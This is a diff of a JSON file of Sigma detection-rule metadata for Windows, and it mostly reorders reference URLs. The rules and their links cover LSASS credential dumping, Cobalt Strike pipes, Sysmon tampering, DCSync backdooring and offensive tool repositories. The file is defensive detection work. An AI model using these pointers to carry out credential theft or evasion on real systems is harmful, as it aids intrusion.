"https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -3049,8 +3049,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158", "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", + "https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_generic_access.yml" ], "tags": [ @@ -3152,8 +3152,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml" ], @@ -3187,8 +3187,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml" ], "tags": [ @@ -3330,10 +3330,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -3367,8 +3367,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/boku7/injectAmsiBypass", "https://github.com/boku7/spawn", + "https://github.com/boku7/injectAmsiBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ @@ -3410,11 +3410,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml" ], "tags": [ @@ -3448,8 +3448,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20", "https://github.com/D1rkMtr/UnhookingPatch", + "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_invoke_patchingapi.yml" ], "tags": [ @@ -3482,9 +3482,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml" ], "tags": [ @@ -3595,8 +3595,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml" ], "tags": [ @@ -3804,8 +3804,8 @@ "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ @@ -3838,8 +3838,8 @@ "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ @@ -3896,10 +3896,10 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://github.com/SigmaHQ/sigma/issues/253", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://github.com/SigmaHQ/sigma/issues/253", + "https://twitter.com/d4rksystem/status/1357010969264873472", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" ], @@ -3934,8 +3934,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/malcomvetter/CSExec", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml" ], "tags": [ @@ -4035,8 +4035,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" ], "tags": [ @@ -4069,8 +4069,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml" ], "tags": [ @@ -4174,8 +4174,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml" ], "tags": [ @@ -4274,9 +4274,9 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/Azure/SimuLand", "https://o365blog.com/post/adfs/", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://github.com/Azure/SimuLand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml" ], "tags": [ @@ -4377,8 +4377,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/hackvens/CoercedPotato", "https://blog.hackvens.fr/articles/CoercedPotato.html", + "https://github.com/hackvens/CoercedPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml" ], "tags": [ @@ -4412,18 +4412,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml" ], "tags": [ @@ -4500,8 +4500,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml" ], "tags": [ @@ -4598,8 +4598,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" ], "tags": [ @@ -4962,8 +4962,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" @@ -4998,8 +4998,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" ], "tags": [ @@ -5117,8 +5117,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ @@ -5152,8 +5152,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6281", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml" ], "tags": [ @@ -5184,8 +5184,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661", "https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_password_policy_enumerated.yml" ], "tags": [ @@ -5387,8 +5387,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/menasec1/status/1106899890377052160", "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://twitter.com/menasec1/status/1106899890377052160", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" ], "tags": [ @@ -5423,9 +5423,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_audit_log_cleared.yml" ], "tags": [ @@ -5494,9 +5494,9 @@ "refs": [ "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/sensepost/ruler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], "tags": [ @@ -5555,8 +5555,8 @@ "logsource.product": "windows", "refs": [ "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" ], "tags": [ @@ -5750,8 +5750,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": [ @@ -5938,8 +5938,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://twitter.com/_dirkjan/status/1309214379003588608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" ], @@ -6065,8 +6065,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" ], @@ -6282,8 +6282,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/fox-it/LDAPFragger", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ @@ -6424,8 +6424,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], @@ -6567,8 +6567,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Live environment caused by malware", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], @@ -6777,7 +6777,7 @@ { "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", "meta": { - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "author": "Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat", "creation_date": "2019/04/03", "falsepositive": [ "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." @@ -6887,8 +6887,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md", "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml" ], "tags": [ @@ -7151,10 +7151,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://twitter.com/Flangvik/status/1283054508084473861", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -7470,8 +7470,8 @@ "logsource.product": "windows", "refs": [ "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -7504,8 +7504,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ @@ -7910,8 +7910,8 @@ "refs": [ "https://x.com/_st0pp3r_/status/1742203752361128162?s=20", "https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation", - "https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp", "https://github.com/deepinstinct/NoFilter", + "https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_nofilter.yml" ], "tags": [ @@ -8159,8 +8159,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" ], @@ -8269,10 +8269,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": [ @@ -8295,16 +8295,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -8455,8 +8455,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" ], "tags": [ @@ -8609,8 +8609,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://adsecurity.org/?p=2053", + "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" ], "tags": [ @@ -8803,8 +8803,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://twitter.com/duzvik/status/1269671601852813320", 